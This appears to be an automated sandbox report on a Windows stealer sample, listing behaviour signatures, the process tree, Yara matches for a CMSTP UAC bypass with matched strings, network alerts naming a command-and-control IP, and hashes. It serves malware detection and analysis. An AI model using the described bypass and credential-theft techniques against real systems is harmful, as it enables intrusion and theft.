Edit tour

Windows Analysis Report
UolJwovI8c.exe

Overview

General Information

Sample name:	UolJwovI8c.exe renamed because original name is a hash value
Original sample name:	b0ad260d058a7f4f299b4bbc7f876799.exe
Analysis ID:	1566414
MD5:	b0ad260d058a7f4f299b4bbc7f876799
SHA1:	e056c9e7fad86450e47c43120f9dd74e20c84db9
SHA256:	79120d139d1041d1c9a506a1a21ed304211f43893dd61295e64028cdb1fa34e2
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

UolJwovI8c.exe (PID: 4364 cmdline: "C:\Users\user\Desktop\UolJwovI8c.exe" MD5: B0AD260D058A7F4F299B4BBC7F876799)

UolJwovI8c.exe (PID: 4876 cmdline: "C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe" -burn.clean.room="C:\Users\user\Desktop\UolJwovI8c.exe" -burn.filehandle.attached=684 -burn.filehandle.self=512 MD5: 5DEBD32329500518D4F21225DCB64E43)

thunderbird.exe (PID: 7040 cmdline: "C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe" MD5: A9D830B99ABEA315C465A440C4AA1B94)

thunderbird.exe (PID: 4932 cmdline: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe MD5: A9D830B99ABEA315C465A440C4AA1B94)

cmd.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Qjsync.exe (PID: 5648 cmdline: C:\Users\user\AppData\Local\Temp\Qjsync.exe MD5: 967F4470627F823F4D7981E511C9824F)

thunderbird.exe (PID: 876 cmdline: "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe" MD5: A9D830B99ABEA315C465A440C4AA1B94)

cmd.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

thunderbird.exe (PID: 3200 cmdline: "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe" MD5: A9D830B99ABEA315C465A440C4AA1B94)

cmd.exe (PID: 6716 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Qjsync.exe (PID: 4184 cmdline: C:\Users\user\AppData\Local\Temp\Qjsync.exe MD5: 967F4470627F823F4D7981E511C9824F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.2963541112.0000000003460000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.2906490239.0000000003E1D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000016.00000002.3401936989.00000000026AB000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000013.00000002.3125872527.0000000003EB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2963866860.00000000053D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.2423574647.0000000003EA5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.2266985552.0000000003E3E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.3289498939.0000000005753000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5936	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Qjsync.exe PID: 5648	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.cmd.exe.5422acd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.5422acd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
12.2.Qjsync.exe.27a86ed.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.Qjsync.exe.27a86ed.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
12.2.Qjsync.exe.27a7aed.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.Qjsync.exe.27a7aed.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
20.2.cmd.exe.579eacd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.579eacd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
20.2.cmd.exe.5759a00.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.5759a00.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
12.2.Qjsync.exe.2762a20.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.Qjsync.exe.2762a20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
8.2.cmd.exe.5182a00.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.cmd.exe.5182a00.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
22.2.Qjsync.exe.26b1a20.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.Qjsync.exe.26b1a20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
14.2.cmd.exe.34607f8.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.34607f8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10f28:$s2: Elevation:Administrator!new:
14.2.cmd.exe.53dda00.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.53dda00.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
8.2.cmd.exe.51c86cd.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.cmd.exe.51c86cd.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
14.2.cmd.exe.54236cd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.cmd.exe.54236cd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
8.2.cmd.exe.51c7acd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.cmd.exe.51c7acd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
20.2.cmd.exe.579f6cd.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.cmd.exe.579f6cd.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
22.2.Qjsync.exe.26f76ed.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.Qjsync.exe.26f76ed.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
22.2.Qjsync.exe.26f6aed.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.Qjsync.exe.26f6aed.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
Click to see the 27 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:25:07.938694+0100	2028371	3	Unknown Traffic	192.168.2.6	49835	104.21.74.149	443	TCP
2024-12-02T07:25:10.586588+0100	2028371	3	Unknown Traffic	192.168.2.6	49841	104.21.74.149	443	TCP
2024-12-02T07:25:12.752590+0100	2028371	3	Unknown Traffic	192.168.2.6	49847	104.21.74.149	443	TCP
2024-12-02T07:25:16.527693+0100	2028371	3	Unknown Traffic	192.168.2.6	49856	104.21.74.149	443	TCP
2024-12-02T07:25:19.200016+0100	2028371	3	Unknown Traffic	192.168.2.6	49861	104.21.74.149	443	TCP
2024-12-02T07:25:21.101889+0100	2028371	3	Unknown Traffic	192.168.2.6	49866	104.21.74.149	443	TCP
2024-12-02T07:25:23.104693+0100	2028371	3	Unknown Traffic	192.168.2.6	49872	104.21.74.149	443	TCP
2024-12-02T07:25:25.059446+0100	2028371	3	Unknown Traffic	192.168.2.6	49877	104.21.74.149	443	TCP
2024-12-02T07:25:27.072842+0100	2028371	3	Unknown Traffic	192.168.2.6	49883	104.21.74.149	443	TCP
2024-12-02T07:25:29.464751+0100	2028371	3	Unknown Traffic	192.168.2.6	49889	104.21.74.149	443	TCP
2024-12-02T07:26:10.090177+0100	2028371	3	Unknown Traffic	192.168.2.6	49981	104.21.74.149	443	TCP

ET MALWARE Win32/DeerStealer CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:25:08.819899+0100	2056550	1	A Network Trojan was detected	192.168.2.6	49835	104.21.74.149	443	TCP
2024-12-02T07:26:10.993284+0100	2056550	1	A Network Trojan was detected	192.168.2.6	49981	104.21.74.149	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\idrccptxisabu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ekxwihvmv	Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005AA0BB DecryptFileW,	0_2_005AA0BB
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005CFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	0_2_005CFA62
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Code function: 0_2_005A9E9E DecryptFileW,DecryptFileW,	0_2_005A9E9E
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0052A0BB DecryptFileW,	2_2_0052A0BB
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_0054FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	2_2_0054FA62
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: 2_2_00529E9E DecryptFileW,DecryptFileW,	2_2_00529E9E

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 14.2.cmd.exe.5422acd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Qjsync.exe.27a86ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Qjsync.exe.27a7aed.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.579eacd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.5759a00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Qjsync.exe.2762a20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.cmd.exe.5182a00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Qjsync.exe.26b1a20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.34607f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.53dda00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.cmd.exe.51c86cd.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.54236cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.cmd.exe.51c7acd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.579f6cd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Qjsync.exe.26f76ed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Qjsync.exe.26f6aed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2963541112.0000000003460000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2906490239.0000000003E1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3401936989.00000000026AB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3125872527.0000000003EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2963866860.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2423574647.0000000003EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2266985552.0000000003E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3289498939.0000000005753000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qjsync.exe PID: 5648, type: MEMORYSTR

Source: UolJwovI8c.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP

Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.149:443 -> 192.168.2.6:49981 version: TLS 1.2

Source: UolJwovI8c.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: UolJwovI8c.exe, 00000000.00000000.2141512330.00000000005DB000.00000002.00000001.01000000.00000003.sdmp, UolJwovI8c.exe, 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmp, UolJwovI8c.exe, 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmp, UolJwovI8c.exe, 00000002.00000000.2146405308.000000000055B000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\smime\smime3.pdb source: thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\lib\libc\src\plc4.pdb source: thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb0x source: Qjsync.exe, 0000000C.00000002.2990467872.0000000000807000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\xpcom\build\xpcom_core.pdb source: UolJwovI8c.exe, 00000002.00000003.2152299284.0000000001237000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000002.2266453328.00000000030F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\js\src\js3250.pdb source: thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Qjsync.exe, 0000000C.00000002.2990467872.0000000000807000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Qjsync.exe, 0000000C.00000002.2993611855.0000000004625000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994456320.000000000502D000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2995684403.000000000562C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3002973538.0000000006428000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993940701.0000000004A2E000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992434111.0000000003C2E000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2997448882.0000000005820000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993776348.000000000482B000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3001297741.0000000006023000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3001773674.0000000006222000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3009942750.000000000682F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994768666.0000000005227000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2998408291.0000000005A2A000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990815003.000000000231E000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2995178015.0000000005424000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010883351.0000000006E23000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994299092.0000000004E2B000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992753897.0000000004029000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010479279.0000000006A26000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2994106239.0000000004C25000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3011054669.0000000007027000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2999681039.0000000005C26000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992266988.0000000003A2F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2991394784.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3010694132.0000000006C2F000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992592814.0000000003E21000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2992985783.0000000004228000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3009392654.0000000006627000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2993433030.0000000004426000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3000721798.0000000005E20000.00000004.00000001.000200
Source:	Binary string: C:\bb\ke-win-x86-r\edit-6.1\build\release\scintilla\bin\SciLexer.pdb source: UolJwovI8c.exe, 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmp
